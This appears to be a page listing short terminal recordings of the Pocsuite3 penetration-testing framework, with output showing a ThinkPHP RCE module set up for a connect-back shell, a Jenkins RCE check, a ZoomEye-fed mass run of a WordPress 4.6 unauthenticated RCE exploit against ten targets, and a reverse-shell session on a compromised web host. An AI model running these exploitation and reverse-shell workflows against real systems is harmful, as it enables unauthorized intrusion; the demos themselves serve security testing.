More by pocsuite
| Name | Current settings | Type | Descript | +-------+------------------+------------+-------------------+ | lhost | *require* | IP Address | Connect back ip | | lport | 10086 | Port | Connect back port | +-------+------------------+------------+-------------------+ Pocsuite3 (pocs/thinkphp_rce) > show ip +-------+-------------------------+ | Index | IP | +-------+-------------------------+ | 0 | fe80::52:4097:e246:9423 | | 1 | 10.13.20.60 | +-------+-------------------------+ Pocsuite3 (pocs/thinkphp_rce) > set lhost
Pocsuite3 console mode 02:36
by pocsuite[05:04:31] [INFO] loading PoC script 'pocsuite3/pocs/20190215_WEB_jenkins_rce.py[05:04:31] [INFO] pocsusite got a total of 1 tasks [05:04:31] [INFO] running poc:'jenkins RCE' target 'http://www.test.com:8080/' [05:04:44] [+] URL : http://www.test.com:8080/ +--------------------------+-------------+--------+-----------+---------+-------| target-url | poc-name | poc-id | component | version | statu+--------------------------+-------------+--------+-----------+---------+-------| http://www.test.com:8080/ | jenkins RCE | 97807 | jenkins | | succe+--------------------------+-------------+--------+-----------+---------+-------success : 1 / 1 [*] shutting down at 05:04:44 root@mail:~/pocsuite3# python3.6 pocsuite3/cli.py -r pocsuite3/pocs/20190215_WE
Jenkins RCE 00:44
by pocsuite[14:28:11] [*] Available ZoomEye web search limit count: 4198, host search limit[14:28:11] [*] checking WordPress Core 4.6 - Unauthenticated Remote Code Executi[14:28:11] [*] parsing multiple targets list from '/Users/pocsuite/.pocsuite/out[14:28:11] [*] pocsuite got a total of 10 targets [14:28:11] [*] starting 10 threads [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution' [14:28:11] [*] poc:'WordPress Core 4.6 - Unauthenticated Remote Code Execution'
Pocsuite with zoomeye API 00:21
by pocsuitepocsuite>: ? ----- Help Menu ----- command description list list connected clients select select which client to send command quit quit shell help print help information pocsuite>: list ----- Remote Clients ----- 0 10.9.1.103 63519 pocsuite>: select 0 Now Connected: 10.9.1.103 10.9.1.103>: pwd /var/www/html 10.9.1.103>: